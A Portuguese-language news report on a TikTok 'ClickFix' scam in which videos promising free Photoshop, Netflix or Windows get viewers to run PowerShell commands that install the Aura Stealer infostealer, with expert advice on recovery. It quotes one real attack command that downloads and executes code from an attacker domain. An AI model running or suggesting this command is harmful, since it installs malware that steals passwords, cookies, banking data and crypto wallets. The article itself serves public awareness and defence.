Campanha perigosa do TikTok promete contas gratuitas da Netflix para instalar malware e roubar dados: veja como detectá-lo
Uma nova forma de roubo de dados foi detectada no TikTok, onde circulam vídeos mostrando supostos métodos para baixar versões gratuitas de programas como Windows, Netflix ou Photoshop.
Por trás desses tutoriais falsos está uma fraude cibernética projetada para roubar informações pessoais e financeiras dos usuários, de acordo com o especialista em segurança cibernética Xavier Mertens, do SANS Internet Storm Center (ISC).
Os vídeos, que usam um tom casual e parecem guias inofensivos, instruem os usuários sobre como executar comandos em seus computadores.
O Photoshop é um dos aplicativos que promete ser gratuito e instalar malware. Foto: iStock
No entanto, em vez de ativar recursos "premium", os comandos instalam software malicioso. Esse método, identificado como ClickFix, já havia sido relatado pelo portal de segurança cibernética Trend Micro e agora se espalhou para o TikTok devido à alta presença de usuários jovens interessados em truques tecnológicos e downloads gratuitos.
Mertens alertou que o TikTok se tornou um canal atraente para cibercriminosos, já que a dinâmica de confiança entre criadores e usuários facilita a rápida disseminação de vídeos enganosos. "É uma forma muito eficaz de engenharia social. As pessoas confiam nos criadores e não suspeitam que um simples comando possa comprometer sua segurança", observou o analista.
Um dos exemplos detectados mostra um vídeo que promete ativar o Photoshop gratuitamente, instruindo os usuários a executar o seguinte comando no PowerShell:
- iex (irm slmgr[.]win/photoshop).
O roubo de dados também é realizado por meio da promessa de Netflix grátis. Foto: iStock
Embora pareça uma instrução técnica inofensiva, na verdade ela conecta o computador a um servidor remoto que baixa arquivos maliciosos. De acordo com o site Bleeping Computer, esses arquivos incluem uma variante do malware Aura Stealer , capaz de extrair senhas salvas em navegadores, cookies de autenticação, dados bancários e carteiras de criptomoedas.
Especialistas recomendam que as pessoas que seguiram as instruções nestes vídeos alterem imediatamente todas as suas senhas, incluindo as de e-mail, redes sociais e contas bancárias. Também devem realizar uma verificação completa com um antivírus atualizado e evitar executar comandos ou baixar qualquer coisa que não seja de fontes oficiais.
Mais notícias:
eltiempo
